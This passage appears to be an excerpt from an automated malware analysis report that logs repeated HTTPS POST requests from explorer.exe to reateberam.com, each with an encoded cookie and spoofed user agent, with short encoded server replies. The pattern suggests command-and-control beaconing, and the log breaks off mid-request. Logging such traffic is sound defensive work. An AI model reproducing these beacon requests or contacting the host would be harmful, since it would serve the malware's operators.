                                                                  2024-12-02 17:45:48 UTC343INData Raw: 31 35 30 0d 0a 50 53 53 62 51 73 75 77 32 34 70 76 59 78 76 59 68 47 50 68 67 33 64 47 4f 45 76 66 41 69 6a 43 61 50 32 7a 76 43 48 4b 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 4a 55 59 70 66 4a 4c 6c 37 46 73 6d 44 72 47 39 74 36 6c 47 73 5a 4b 75 70 63 6f 36 36 6b 35 53 46 47 56 4d 37 38 61 6d 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 41 35 41 2b 7a 6a 4b 52 39 2b 62 62 48 46 66 33 59 70 37 73 74 42 37 31 54 66 44 68 70 43 37 45 34 34 4e 31 67 4b 50 59 58 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 61 51 70
                                                                  Data Ascii: 150PSSbQsuw24pvYxvYhGPhg3dGOEvfAijCaP2zvCHKZ2mcphSGpB6yiJiVjA1tJUYpfJLl7FsmDrG9t6lGsZKupco66k5SFGVM78amfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcA5A+zjKR9+bbHFf3Yp7stB71TfDhpC7E44N1gKPYXMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1aQp
                                                                  2024-12-02 17:45:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.550009172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:50 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:51 UTC797INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZGHr7Ez%2FrjWzq6Cl%2B%2FkIFSzG9oJXgJvL71AqV1yBatSL74LvU%2BfcPwpndSH8tNI5hb1vVMORzqIjPM9LXROjvZokraK9OvUoOCnNYhAS1SsI5RSZi%2BvL5o%2BXKKnmXdndQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd220b59d9ab63-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13923&min_rtt=13911&rtt_var=5225&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=209905&cwnd=32&unsent_bytes=0&cid=1beb4e4968beaae4&ts=900&x=0"
                                                                  2024-12-02 17:45:51 UTC339INData Raw: 31 34 63 0d 0a 4f 53 57 59 51 63 53 7a 32 6f 70 6a 61 78 6e 66 6a 47 62 70 67 33 42 4f 4f 30 72 58 42 53 54 43 61 2f 69 33 76 53 48 4c 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4c 6b 59 69 66 4a 62 6f 37 46 67 6d 44 37 65 32 74 65 30 4e 74 35 4f 70 6f 38 34 2f 67 69 5a 52 46 47 46 50 37 73 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 77 31 42 75 37 6c 4a 6e 4d 5a 62 72 50 43 65 58 64 68 35 6f 64 43 35 6c 48 63 41 58 5a 48 69 6b 6b 38 4d 46 34 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 4e 56 52 4a
                                                                  Data Ascii: 14cOSWYQcSz2opjaxnfjGbpg3BOO0rXBSTCa/i3vSHLZmmcphSGpB6yiJiVjA1mLkYifJbo7FgmD7e2te0Nt5Opo84/giZRFGFP7sXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Fcw1Bu7lJnMZbrPCeXdh5odC5lHcAXZHikk8MF4AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/NVRJ
                                                                  2024-12-02 17:45:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.550010172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:52 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:53 UTC799INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGY%2Bwln367lELMbjJ%2BkApjnlYQHFk3YXA1%2BxSpTFM25th%2BHyaQbvTAMsoswFy5%2FG%2FeBhFXvxb84LNSyuRXH788hD5tVPyEUs5JUKzw1AGkyUSFfmu2wYceEluNIzGESaBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22188c364328-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=21199&min_rtt=1809&rtt_var=12303&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1614151&cwnd=220&unsent_bytes=0&cid=c499705b81e5339c&ts=753&x=0"
                                                                  2024-12-02 17:45:53 UTC343INData Raw: 31 35 30 0d 0a 4f 53 57 55 52 38 53 78 33 34 70 6b 5a 68 6a 59 68 32 58 68 67 33 46 48 50 45 4c 66 44 53 4c 43 61 76 69 33 75 43 4c 46 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 70 4a 55 51 72 66 4a 75 4f 68 6c 38 6e 44 62 61 32 73 75 30 49 73 4a 53 6d 6f 38 77 34 67 69 64 54 48 57 46 46 36 73 62 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 73 41 77 41 75 6e 6e 4a 58 4d 53 62 37 2f 48 65 58 51 74 71 34 56 41 36 6c 76 5a 43 68 34 70 69 30 38 35 4d 31 67 49 4f 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 39 57 52 5a
                                                                  Data Ascii: 150OSWUR8Sx34pkZhjYh2Xhg3FHPELfDSLCavi3uCLFKRib7xuPoA21j4bUiz5pJUQrfJuOhl8nDba2su0IsJSmo8w4gidTHWFF6sbsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FsAwAunnJXMSb7/HeXQtq4VA6lvZCh4pi085M1gIOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf9WRZ
                                                                  2024-12-02 17:45:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.550011172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:54 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:55 UTC790INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ooNR19ZAWOZtwAOtd4acpq9bHD3Z%2BpoAnmKSaRsZObihz5xuSCRFC3YqhrR0QZFtfo%2FJXJUyJsVY2zwDig35XzZfPNSjX5CaV4YMcilWqv%2B5RyUmpVONHX5f24E0EOs53A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2225ba197c9f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1779&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1532004&cwnd=213&unsent_bytes=0&cid=b13e7adbef4bc2ad&ts=802&x=0"
                                                                  2024-12-02 17:45:55 UTC347INData Raw: 31 35 34 0d 0a 50 69 69 59 51 4d 65 79 32 34 70 67 59 52 58 51 6a 47 50 6b 67 33 4e 4b 4d 6b 2f 65 42 43 50 43 62 50 65 36 76 69 37 49 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 4a 6b 55 70 66 4a 58 70 37 46 38 67 41 62 57 32 73 36 6c 47 74 35 65 73 70 73 45 32 37 45 35 63 47 32 64 4d 36 63 65 67 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 45 34 41 4f 6a 6c 4a 52 74 2b 61 62 62 41 63 33 49 6b 35 73 74 42 36 6c 54 63 43 78 74 47 37 45 77 31 4e 56 34 50 50 49 6e 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 53 51 5a
                                                                  Data Ascii: 154PiiYQMey24pgYRXQjGPkg3NKMk/eBCPCbPe6vi7IYWmcphSGpB6yiJiVjA1nJkUpfJXp7F8gAbW2s6lGt5espsE27E5cG2dM6cegfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcE4AOjlJRt+abbAc3Ik5stB6lTcCxtG7Ew1NV4PPInMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1SQZ
                                                                  2024-12-02 17:45:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.550012172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:57 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:57 UTC788INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMmzzuVWXJLx1U08e26PWtc3WnB66pQUdWv7X0qb6aC%2Fm00hMCijwymeYMnlsjcgsgobAI7ZkvD0AlsS1jxZeyRLyX5Nc0kDQf0ZhzwQTKXC2V0UD8akrCOemNEZUVMhoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2235ecc0ac9c-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=15979&min_rtt=14151&rtt_var=8964&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=101452&cwnd=32&unsent_bytes=0&cid=a716180102c5a160&ts=1231&x=0"
                                                                  2024-12-02 17:45:57 UTC343INData Raw: 31 35 30 0d 0a 4f 53 69 56 52 63 43 37 74 75 5a 6e 61 68 37 61 67 47 43 73 7a 58 52 4c 50 6b 6e 58 41 55 36 6f 61 76 69 79 75 53 65 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 75 44 64 74 49 45 38 70 65 2f 7a 6b 68 6c 38 67 43 37 57 2f 2f 61 49 4a 74 4a 4f 6f 70 63 42 52 37 43 5a 57 48 32 70 4c 35 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 46 45 73 73 79 44 4f 76 68 54 68 34 56 5a 62 2f 44 65 6a 30 6c 35 6f 35 47 35 6c 4c 64 5a 78 78 44 68 30 77 2f 4d 46 35 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 69 50 50 42 58 52 4a
                                                                  Data Ascii: 150OSiVRcC7tuZnah7agGCszXRLPknXAU6oaviyuSeAWB/S4BKLswqykcfTuDdtIE8pe/zkhl8gC7W//aIJtJOopcBR7CZWH2pL54+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzFEssyDOvhTh4VZb/Dej0l5o5G5lLdZxxDh0w/MF5EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbiPPBXRJ
                                                                  2024-12-02 17:45:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.550013172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:59 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:00 UTC793INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BVTh6djcY6zsZEsQdKJgfDwsWbjQSFfGDwd7%2B8D5VWViPBXb7K6HI6yh05WuOENcFl17tMrVK16QDcEXlBqWpI2aOnxYjXiwI5IMroBXcfDBIF6%2BVv4gH95e%2FfIh3hw1Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22439b15a214-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13987&min_rtt=13971&rtt_var=5272&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=207062&cwnd=32&unsent_bytes=0&cid=4fe64cfc75a60d2b&ts=787&x=0"
                                                                  2024-12-02 17:46:00 UTC343INData Raw: 31 35 30 0d 0a 50 43 71 62 54 4d 71 33 30 49 70 75 61 78 76 65 67 6d 4c 6f 67 33 39 50 50 45 72 52 42 43 66 43 61 50 2b 32 76 43 62 4c 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4a 6b 4d 71 66 5a 62 6b 37 46 30 67 44 37 65 36 75 4b 4a 47 74 5a 65 6f 6f 63 41 38 37 30 35 64 47 57 4e 4d 37 73 47 6f 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 30 34 42 75 33 6a 49 48 4d 51 62 37 58 43 65 33 51 6c 71 34 52 47 37 31 72 66 43 52 41 70 69 6b 67 2b 4e 31 38 49 4f 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 42 57 52 70
                                                                  Data Ascii: 150PCqbTMq30IpuaxvegmLog39PPErRBCfCaP+2vCbLZ2mcphSGpB6yiJiVjA1mJkMqfZbk7F0gD7e6uKJGtZeoocA8705dGWNM7sGofW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc04Bu3jIHMQb7XCe3Qlq4RG71rfCRApikg+N18IOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfBWRp
                                                                  2024-12-02 17:46:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.550014172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:01 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:02 UTC801INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IV2j5ABp0%2FWXjmscG6ZqU%2BW2XGZCTRY4ozL33rvft%2ByQnmUD8JFaDloNQGZ1SuGxqm1%2BdYSIO96XJSmEWY%2BoAvlJznZtBO2SSs0r83TvFGs7Um%2BLAmC%2F6SCLZZNAtT%2BBwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd225118af53fb-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=15393&min_rtt=14200&rtt_var=7711&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=122968&cwnd=32&unsent_bytes=0&cid=09caf0d190581e18&ts=697&x=0"
                                                                  2024-12-02 17:46:02 UTC343INData Raw: 31 35 30 0d 0a 4d 69 71 63 52 63 61 7a 32 59 70 75 5a 42 2f 66 6a 47 54 6d 67 33 64 4e 50 6b 6e 54 42 69 4c 43 62 76 61 7a 76 53 54 4b 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 4a 6b 51 73 65 70 50 69 37 46 63 6d 44 62 53 35 74 71 56 47 74 70 65 74 6f 73 77 34 36 6b 35 54 48 6d 4e 4e 35 38 61 6b 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 78 42 65 33 68 4a 58 4d 51 62 72 50 48 65 33 49 73 71 34 4a 48 36 6c 54 66 43 68 6b 70 68 6b 77 2b 4e 31 6b 4a 50 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4a 61 54 70
                                                                  Data Ascii: 150MiqcRcaz2YpuZB/fjGTmg3dNPknTBiLCbvazvSTKZ2mcphSGpB6yiJiVjA1rJkQsepPi7FcmDbS5tqVGtpetosw46k5THmNN58akfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcsxBe3hJXMQbrPHe3Isq4JH6lTfChkphkw+N1kJPcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfJaTp
                                                                  2024-12-02 17:46:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.550015172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:04 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:04 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=my4VKWZqIDHRv7sOI8a1OnBh3kH8ecaJoJpKZBekFlYAcQ3xHMOM%2FHm5lLbgNk0fmGu%2BZjKTnodtwIXA6K6A2oq4BDzOLs5vuSjoOuz46QUVsykMKkgcxVJygfXySgWpkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2261d80dab03-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14194&min_rtt=14190&rtt_var=5330&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=205243&cwnd=32&unsent_bytes=0&cid=d5bc2c68ed21cfe4&ts=703&x=0"
                                                                  2024-12-02 17:46:04 UTC339INData Raw: 31 34 63 0d 0a 50 79 32 66 51 4d 65 36 32 6f 70 6b 5a 42 33 61 67 57 48 6b 67 33 4e 4f 4f 55 7a 57 44 43 48 43 5a 2f 32 31 76 69 44 4b 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 49 45 59 6a 63 70 72 6c 37 46 67 6b 43 37 47 32 73 61 4e 47 74 5a 43 76 6f 4d 73 38 36 45 35 53 47 6d 42 4c 36 38 53 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 34 77 42 65 33 72 4a 52 35 2b 62 62 48 43 66 33 6b 72 34 4d 74 42 35 31 48 66 43 52 39 48 37 45 67 37 4e 6c 49 4d 4f 4d 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 46 52 51 4a
                                                                  Data Ascii: 14cPy2fQMe62opkZB3agWHkg3NOOUzWDCHCZ/21viDKZmmcphSGpB6yiJiVjA1tIEYjcprl7FgkC7G2saNGtZCvoMs86E5SGmBL68SifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc4wBe3rJR5+bbHCf3kr4MtB51HfCR9H7Eg7NlIMOMC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfFRQJ
                                                                  2024-12-02 17:46:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.550016172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:06 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
